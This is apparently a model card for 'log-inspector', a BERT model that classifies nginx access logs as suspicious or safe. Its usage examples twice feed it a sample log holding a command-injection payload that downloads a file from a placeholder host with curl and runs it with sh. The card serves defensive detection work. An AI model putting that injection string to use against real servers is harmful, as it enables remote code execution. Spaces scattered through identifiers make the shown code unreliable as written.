đ Log Inspector
A pre - trained model for inspecting nginx access logs, based on [bert - base - cased](https://huggingface.co/bert - base - cased).
đ Quick Start
This model is designed to inspect nginx access logs. It can classify logs into suspicious and safe categories.
đģ Usage Examples
Basic Usage
The given text must be parsed in the following format:
"path: <path>; ref:<referrer>; ua:<user agent>;"
>>> from transformers import pipeline
>>> inspector = pipeline('text - classification', model="u - haru/log - inspector")
>>> inspector('path: /cgi - bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;')
[{'label': 'LABEL_0', 'score': 0.9999788999557495}]
Here, class 0 represents a suspicious log, and class 1 represents a safe log.
Advanced Usage
Using simpletransformer
>>> from simpletransformers.classification import ClassificationModel
>>> model = ClassificationModel('bert', "u - haru/log - inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
>>> predictions, raw_outputs = model.predict(['path: /cgi - bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;'])
>>> print(predictions)
[0]
Evaluation and Training
>>> from simpletransformers.classification import ClassificationModel
>>> model = ClassificationModel('bert', "u - haru/log - inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
>>> data = [["Suspicious log",0],["Safe log",1]]
>>> df = pd.DataFrame(data)
>>> model.train_model(df)
>>> result, model_outputs, wrong_predictions = model.eval_model(df)
>>> print(result)
{'mcc': 1.0, 'tp': 1, 'tn': 1, 'fp': 0, 'fn': 0, 'auroc': 1.0, 'auprc': 1.0, 'eval_loss': 1.8238850316265598e - 05}
The model was trained with 9500 access logs. Here is the evaluation score:
{'mcc': 0.993114718313972, 'tp': 1639, 'tn': 729, 'fp': 0, 'fn': 7, 'auroc': 0.9994166345815686, 'auprc': 0.9997937194890235, 'eval_loss': 0.020282083051662583}
And the evaluation with 10000 logs:
{'mcc': 0.8494104528008076, 'tp': 9964, 'tn': 26, 'fp': 0, 'fn': 10, 'auroc': 0.9999845752803442, 'auprc': 0.9999999597891697, 'eval_loss': 0.0058870489358901976}
đ Documentation
The source codes for training are available here: [github.com/u - haru/log - inspector](https://github.com/u - haru/log - inspector)
đ License
This project is licensed under the Apache 2.0 license.